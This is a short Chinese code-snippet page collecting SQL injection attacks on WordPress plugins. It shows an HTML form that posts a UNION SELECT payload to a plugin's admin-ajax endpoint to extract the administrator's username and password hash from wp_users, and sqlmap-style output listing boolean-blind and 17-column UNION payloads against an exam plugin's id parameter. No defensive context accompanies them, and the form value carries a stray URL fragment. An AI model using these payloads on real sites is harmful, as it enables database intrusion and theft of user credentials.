wordpress plugins sql injection

首页 > 代码库 > wordpress plugins sql injection

2024-11-03 00:21:02 204人阅读

<*form method="post"

action="http://***/wp-admin/admin-ajax.php?action=get_upcp_subcategories">

<*input type="text" name="CatID" value="http://www.mamicode.com/0 UNION SELECT

user_login,user_pass FROM wp_users WHERE ID=1">

<*input type="submit">

通过提交的value

https://***/wp-admin/admin.php?page=examapp_UserResult&info=view&id=79 and 1=1

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: page=examapp_UserResult&info=view&id=78 AND 6705=6705

Type: UNION query

Title: Generic UNION query (NULL) - 17 columns

Payload: page=examapp_UserResult&info=view&id=-4748 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716b71,0x6b4c5247597261614e73447378544741764b4f7172597a5a58494551685a7056644d6e595773496e,0x7162787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KttP

wordpress plugins sql injection

声明：以上内容来自用户投稿及互联网公开渠道收集整理发布，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任，若内容有误或涉及侵权可进行投诉：投诉/举报工作人员会在5个工作日内联系你，一经查实，本站将立刻删除涉嫌侵权内容。

联系
我们

首页 > 代码库 > wordpress plugins sql injection

wordpress plugins sql injection

看完仍有疑问？有类似问题直接问程序猿